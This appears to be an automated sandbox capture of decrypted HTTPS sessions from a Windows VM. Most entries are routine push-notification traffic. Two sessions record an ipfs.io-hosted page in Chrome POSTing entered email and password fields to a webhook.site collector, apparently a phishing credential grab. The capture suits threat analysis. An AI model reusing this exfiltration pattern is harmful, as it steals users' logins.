Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.6	49865	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:23 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 56 51 51 6d 4d 52 6e 6e 54 55 71 57 43 41 4c 6d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 61 61 39 33 37 63 66 38 39 35 39 35 66 63 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: VQQmMRnnTUqWCALm.1Context: 70aa937cf89595fc
2025-01-14 00:48:23 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:23 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 56 51 51 6d 4d 52 6e 6e 54 55 71 57 43 41 4c 6d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 61 61 39 33 37 63 66 38 39 35 39 35 66 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: VQQmMRnnTUqWCALm.2Context: 70aa937cf89595fc<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:48:23 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 56 51 51 6d 4d 52 6e 6e 54 55 71 57 43 41 4c 6d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 30 61 61 39 33 37 63 66 38 39 35 39 35 66 63 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: VQQmMRnnTUqWCALm.3Context: 70aa937cf89595fc
2025-01-14 00:48:23 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:23 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 53 64 34 4e 37 32 51 30 6a 6b 47 54 4b 39 33 52 41 4d 55 2b 76 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: Sd4N72Q0jkGTK93RAMU+vA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49926	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:33 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6a 36 59 44 65 4f 47 53 55 45 2b 74 6d 6a 57 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 30 30 64 61 64 39 65 37 30 34 65 35 39 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: j6YDeOGSUE+tmjWR.1Context: 7d00dad9e704e596
2025-01-14 00:48:33 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:33 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6a 36 59 44 65 4f 47 53 55 45 2b 74 6d 6a 57 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 30 30 64 61 64 39 65 37 30 34 65 35 39 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: j6YDeOGSUE+tmjWR.2Context: 7d00dad9e704e596<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:48:33 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 6a 36 59 44 65 4f 47 53 55 45 2b 74 6d 6a 57 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 30 30 64 61 64 39 65 37 30 34 65 35 39 36 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: j6YDeOGSUE+tmjWR.3Context: 7d00dad9e704e596
2025-01-14 00:48:34 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:34 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 42 59 43 51 6b 43 4d 57 68 6b 4f 4c 65 48 51 72 66 7a 6f 6f 4e 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: BYCQkCMWhkOLeHQrfzooNQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.6	49957	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:38 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 57 53 30 63 6f 32 65 4a 30 4b 51 4d 53 52 62 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 38 38 32 34 30 30 31 66 65 33 66 30 34 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: IWS0co2eJ0KQMSRb.1Context: b28824001fe3f04d
2025-01-14 00:48:38 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:38 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 49 57 53 30 63 6f 32 65 4a 30 4b 51 4d 53 52 62 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 38 38 32 34 30 30 31 66 65 33 66 30 34 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: IWS0co2eJ0KQMSRb.2Context: b28824001fe3f04d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:48:38 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 49 57 53 30 63 6f 32 65 4a 30 4b 51 4d 53 52 62 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 38 38 32 34 30 30 31 66 65 33 66 30 34 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: IWS0co2eJ0KQMSRb.3Context: b28824001fe3f04d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:48:39 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:39 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 38 6f 43 75 33 56 4f 2b 38 30 79 2f 77 61 66 70 38 42 4b 39 7a 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 8oCu3VO+80y/wafp8BK9zw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49977	178.63.67.153	443	5264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:41 UTC	688	OUT	POST /87f659f6-075d-4e0e-b197-649a09850ad0 HTTP/1.1 Host: webhook.site Connection: keep-alive Content-Length: 45 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://ipfs.io Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 00:48:41 UTC	45	OUT	Data Raw: 74 65 6d 61 69 6c 3d 6b 6b 37 6c 66 30 25 34 30 78 73 6a 63 6a 72 65 2e 63 6f 6d 26 74 70 61 73 73 3d 69 2a 48 53 39 47 72 38 4f 21 50 Data Ascii: temail=kk7lf0%40xsjcjre.com&tpass=i*HS9Gr8O!P
2025-01-14 00:48:41 UTC	294	IN	HTTP/1.1 200 OK server: nginx content-type: text/html; charset=UTF-8 transfer-encoding: chunked x-request-id: 8333c507-89ea-46fb-97fb-4ee1bd05361b x-token-id: 87f659f6-075d-4e0e-b197-649a09850ad0 cache-control: no-cache, private date: Tue, 14 Jan 2025 00:48:41 GMT connection: close
2025-01-14 00:48:41 UTC	156	IN	Data Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 38 37 66 36 35 39 66 36 2d 30 37 35 64 2d 34 65 30 65 2d 62 31 39 37 2d 36 34 39 61 30 39 38 35 30 61 64 30 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/87f659f6-075d-4e0e-b197-649a09850ad0">View in Webhook.site</a>.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49999	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:45 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 77 6a 68 49 65 73 74 51 4e 55 65 74 56 6d 71 73 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 65 32 32 38 39 31 35 61 66 64 32 62 33 65 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: wjhIestQNUetVmqs.1Context: 3be228915afd2b3e
2025-01-14 00:48:45 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:45 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 77 6a 68 49 65 73 74 51 4e 55 65 74 56 6d 71 73 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 65 32 32 38 39 31 35 61 66 64 32 62 33 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: wjhIestQNUetVmqs.2Context: 3be228915afd2b3e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
2025-01-14 00:48:45 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 77 6a 68 49 65 73 74 51 4e 55 65 74 56 6d 71 73 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 65 32 32 38 39 31 35 61 66 64 32 62 33 65 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: wjhIestQNUetVmqs.3Context: 3be228915afd2b3e
2025-01-14 00:48:45 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:48:45 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 33 37 43 50 4d 77 6a 62 46 55 47 41 61 62 4d 41 5a 4a 44 75 75 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 37CPMwjbFUGAabMAZJDuug.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	50010	178.63.67.153	443	5264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:53 UTC	688	OUT	POST /87f659f6-075d-4e0e-b197-649a09850ad0 HTTP/1.1 Host: webhook.site Connection: keep-alive Content-Length: 49 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://ipfs.io Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 00:48:53 UTC	49	OUT	Data Raw: 74 65 6d 61 69 6c 3d 6b 6b 37 6c 66 30 25 34 30 78 73 6a 63 6a 72 65 2e 63 6f 6d 26 74 70 61 73 73 3d 32 25 35 42 57 39 68 70 30 2a 25 37 43 77 67 Data Ascii: temail=kk7lf0%40xsjcjre.com&tpass=2%5BW9hp0*%7Cwg
2025-01-14 00:48:53 UTC	294	IN	HTTP/1.1 200 OK server: nginx content-type: text/html; charset=UTF-8 transfer-encoding: chunked x-request-id: d5aff1ed-48d2-4f23-bfef-34602f2b1937 x-token-id: 87f659f6-075d-4e0e-b197-649a09850ad0 cache-control: no-cache, private date: Tue, 14 Jan 2025 00:48:53 GMT connection: close
2025-01-14 00:48:53 UTC	156	IN	Data Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 38 37 66 36 35 39 66 36 2d 30 37 35 64 2d 34 65 30 65 2d 62 31 39 37 2d 36 34 39 61 30 39 38 35 30 61 64 30 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/87f659f6-075d-4e0e-b197-649a09850ad0">View in Webhook.site</a>.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	50012	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:48:58 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 48 62 44 32 65 50 6d 30 45 65 33 6d 48 41 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 35 34 38 36 66 61 31 38 38 31 34 66 31 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 5HbD2ePm0Ee3mHAt.1Context: b65486fa18814f1d
2025-01-14 00:48:58 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:48:58 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 48 62 44 32 65 50 6d 30 45 65 33 6d 48 41 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 36 35 34 38 36 66 61 31 38 38 31 34 66 31 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 6a 6b 4c 74 76 5a 38 41 57 79 77 55 73 48 66 76 62 45 73 78 7a 6b 54 49 31 65 7a 45 4f 34 48 51 59 61 4a 46 79 7a 77 44 4f 6c 55 55 4f 5a 77 66 42 75 74 71 39 47 48 31 34 7a 6f 32 66 31 65 73 6e 4a 45 70 4c 59 4e 48 33 51 70 49 67 67 36 31 43 37 50 43 6a 50 6d 39 42 76 46 71 76 6e 6d 37 44 30 51 4e 33 6f 37 54 33 48 36 6f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5HbD2ePm0Ee3mHAt.2Context: b65486fa18814f1d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAejkLtvZ8AWywUsHfvbEsxzkTI1ezEO4HQYaJFyzwDOlUUOZwfButq9GH14zo2f1esnJEpLYNH3QpIgg61C7PCjPm9BvFqvnm7D0QN3o7T3H6o
